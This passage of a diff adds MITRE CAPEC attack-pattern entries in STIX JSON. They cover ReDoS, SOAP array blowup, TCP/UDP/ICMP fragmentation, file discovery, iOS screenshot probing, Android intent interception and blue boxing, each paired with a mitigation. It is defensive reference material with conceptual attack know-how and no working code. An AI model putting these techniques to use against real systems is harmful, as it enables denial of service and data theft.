", + "x_capec_prerequisites": [ + "This type of attack requires a server that accepts serialization data which supports substitution and parses the data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "spec_version": "2.1", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aad3b8f3-e7c0-49fd-8535-2db1e2a789ee", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. 
This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.", + "external_references": [ + { + "external_id": "CAPEC-492", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/492.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-1333", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1333.html" + }, + { + "description": "Regular expression Denial of Service - ReDoS", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS" + }, + { + "description": "Bryan Sullivan, Regular Expression Denial of Service Attacks and Defenses", + "external_id": "REF-421", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-au/magazine/ff646973.aspx" + } + ], + "id": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Regular Expression Exponential Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. 
Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.", + "id": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-492-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbd942cb-719b-4645-a9fe-77e24232dbee", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "spec_version": "2.1", + "target_ref": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a web service that uses SOAP messages in communication. 
By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.", + "external_references": [ + { + "external_id": "CAPEC-493", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/493.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "SOAP Array Attack", + "external_id": "REF-422", + "source_name": "reference_from_CAPEC", + "url": "http://www.ws-attacks.org/index.php/Soap_Array_Attack" + } + ], + "id": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "SOAP Array Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. 
One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f6f476-720d-4647-8211-640732114f60", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "spec_version": "2.1", + "target_ref": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.", + "external_references": [ + { + "external_id": "CAPEC-494", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Security Considerations - IP Fragment Filtering", + "external_id": "REF-423", 
+ "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc1858.txt" + } + ], + "id": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "TCP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In comparison, IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. This behavior of fragmentation defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled.\n Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the adversary needs to ability to send TCP packets of arbitrary size with crafted data." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \"IF FO=1 and PROTOCOL=TCP then DROP PACKET\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.", + "id": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-494-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c63b7b2-466c-4c0a-9b40-4dc3b26ad502", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "spec_version": "2.1", + "target_ref": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a UDP Fragmentation attack against 
a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.", + "external_references": [ + { + "external_id": "CAPEC-495", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/495.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Yossi Gilad, Amir Herzberg, Fragmentation Considered Vulnerable, 2012", + "external_id": "REF-424", + "source_name": "reference_from_CAPEC", + "url": "http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf" + } + ], + "id": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "modified": "2019-04-04T00:00:00.000Z", + "name": "UDP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.", + "id": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-495-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a8d2ca3-6686-47c3-ba2b-0bd391ee4af9", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "spec_version": "2.1", + "target_ref": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. 
Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated through egress filtering based on ICMP payload so a network is a \"good neighbor\" to other networks. 
Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.", + "id": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-496-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4385941-4381-4b52-8fff-1a5170cad3da", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. 
Using this knowledge may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-497", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/497.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + } + ], + "id": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "modified": "2020-12-17T00:00:00.000Z", + "name": "File Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_prerequisites": [ + "The adversary must know the location of these common key files." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage file protection mechanisms to render these files accessible only to authorized parties.", + "id": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-497-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--47804bd8-6b7f-435e-b2e4-277a8a51384e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "spec_version": "2.1", + "target_ref": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. 
This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. 
This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.", + "id": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-498-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04be062d-d511-410f-99c9-f9f7993a39af", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "spec_version": "2.1", + "target_ref": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.", + "external_references": [ + { + "external_id": "CAPEC-499", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/499.html" + }, + { + "external_id": "CWE-925", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/925.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Intent Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + 
"x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents from a target application

  2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
  3. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Intercept Implicit Intents: Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.

  2. Techniques
    Block the intent from reaching the desired location, causing a denial of service
    Gather sensitive information from the intercepted intent
    Modify the contents of the intent and forward along to another application
", + "x_capec_parent_of_refs": [ + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. 
Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ede8d88a-2bc4-4188-a9d7-2dbbe7c96fb5", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "spec_version": "2.1", + "target_ref": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. 
While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.\n \n This attack pattern is included in CAPEC for historical purposes.\n \n ", + "external_references": [ + { + "external_id": "CAPEC-5", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/5.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Blue Boxing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a 